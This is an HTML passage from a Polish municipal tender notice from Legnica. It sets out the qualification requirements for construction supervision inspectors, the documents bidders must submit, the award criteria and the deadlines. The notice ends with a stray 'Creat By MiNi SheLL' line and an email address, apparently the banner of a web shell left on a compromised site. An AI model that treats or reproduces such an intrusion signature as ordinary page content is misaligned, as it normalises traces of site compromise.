  - dla inspektora nadzoru robót budowlanych branży drogowej - koordynator inspektorów nadzoru informacji na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności zgodnie z pkt  1)  litera a) i litera b);
  - dla inspektora nadzoru robót elektrycznych informacji na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności zgodnie z pkt  2)  litera a) i litera  b);
  - dla inspektora nadzoru robót sanitarnych informacji na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności zgodnie z pkt  3)  litera a);
  - dla inspektora nadzoru robót mostowych informacji na temat jego kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności zgodnie z pkt  4)  litera a) i litera b);
  c) oświadczenia, że wskazane w załączniku nr 3 osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają ww. wymagane uprawnienia w rozumieniu ustawy Prawo budowlane z 07.07.1994 
(Dz. U. z 2013r., poz.1409 - ze zmianami)  oraz  że są  wpisane  na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2  ustawy Prawo budowlane  z 07.07.1994r. (Dz. U. z 2013r., poz.1409 - ze zmianami) i ubezpieczone od odpowiedzialności cywilnej za szkody, które mogą wyniknąć 
w związku z wykonywaniem w/w funkcji.     
Ocena spełnienia w/w warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia.    

UWAGA:  Wszystkie wyżej wymienione osoby mogą łączyć  maksymalnie dwie funkcje. 

Definicje: 
Droga : droga zgodnie z definicją zawarta w  art. 4 pkt 2) ustawy z dnia 21 marca 1985r. o drogach publicznych Dz. U. z 2013r., poz. 260 ze zmianami.
Most drogowy:  przez pojęcie most drogowy  Zamawiający rozumie obiekt  służący do zapewnienia komunikacji drogowej nad przeszkodą wodną. 
Obiekt mostowy: przez pojęcie obiekt mostowy  Zamawiający rozumie budowlę przeznaczoną do przeprowadzenia drogi nad przeszkodą terenową tj. most lub wiadukt lub estakadę.

Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty wg załączonego druku  Rozdziału  Nr 1 specyfikacji istotnych warunków zamówienia.
2.   Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu z art. 22 ust.1 ustawy Pzp wg załącznika nr 1 do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
3.  Oświadczenie, że osoby wykazane w załączniku nr 3 do Instrukcji dla Wykonawców - Rozdział 2     siwz, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane  kwalifikacja zawodowe i  doświadczenie.  
4. Oświadczenie Wykonawcy - wskazanie części zamówienia, której wykonanie powierzy podwykonawcom - wg wzoru załącznika nr 4 do Instrukcji dla Wykonawców - Rozdział 2     siwz.
5.   Oświadczenie Wykonawcy na przyjęcie warunków zmian w umowie - wg załącznika nr 5 
do Instrukcji dla Wykonawców - Rozdział 2     siwz.
6.  Wypełnioną umowę  wg Rozdziału Nr  3 -  wypełnienie  i  akceptacja   umowy  nie  stanowi zobowiązań   prawnych ze strony Zamawiającego.
7. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia pełnomocnictwo, w którym Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanowią i wskażą Zamawiającemu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowanie w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego. Pełnomocnictwo będzie podpisane przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawców zgodnie z dokumentami rejestracyjnymi. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawcy każdy Wykonawca musi złożyć dokumenty sporządzone przez jego właściwy organ, a uprawniający daną osobę lub osoby do reprezentowania Wykonawcy i podpisywania oświadczeń w imieniu Wykonawców.
8. Jeżeli Wykonawca, zgodnie z art. 26  ust 2b ustawy Pzp w zakresie warunków określonych 
w pkt. 13 Instrukcji dla Wykonawców - Rozdział 2 siwz polegał będzie na osobach zdolnych do wykonania zamówienia innych podmiotów, a podmioty te będą brały udział  w realizacji części zamówienia, podmioty te - każdy z podmiotów- musi przedstawić - załączyć do oferty oświadczenie i dokumenty określone w pkt.  15 Instrukcji dla Wykonawców - Rozdział 2     siwz tj: 
          8.1. oświadczenie o braku podstaw do wykluczenia  z postępowania o udzielenie  zamówienia na podstawie  art. 24 ust 1 i ust 2a ustawy Pzp- wg wzoru załącznika nr 2 do Instrukcji dla Wykonawców - Rozdział 2     siwz. 
          8.2  aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru,      wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust 1 pkt 2) ustawy Pzp. 
9.  Dowód wpłacenia/wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami załącznika WARUNKI ZMIAN W UMOWIE - załącznik nr 6 do Instrukcji dla Wykonawców- Rozdział 2 siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.bip.legnica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Legnica, Plac Słowiański 7 , pokój nr 22- Referat Zamówień  Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2016 godzina 10:00, miejsce: Urząd Miasta Legnica, Plac Słowiański 8 , pokój nr 208..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com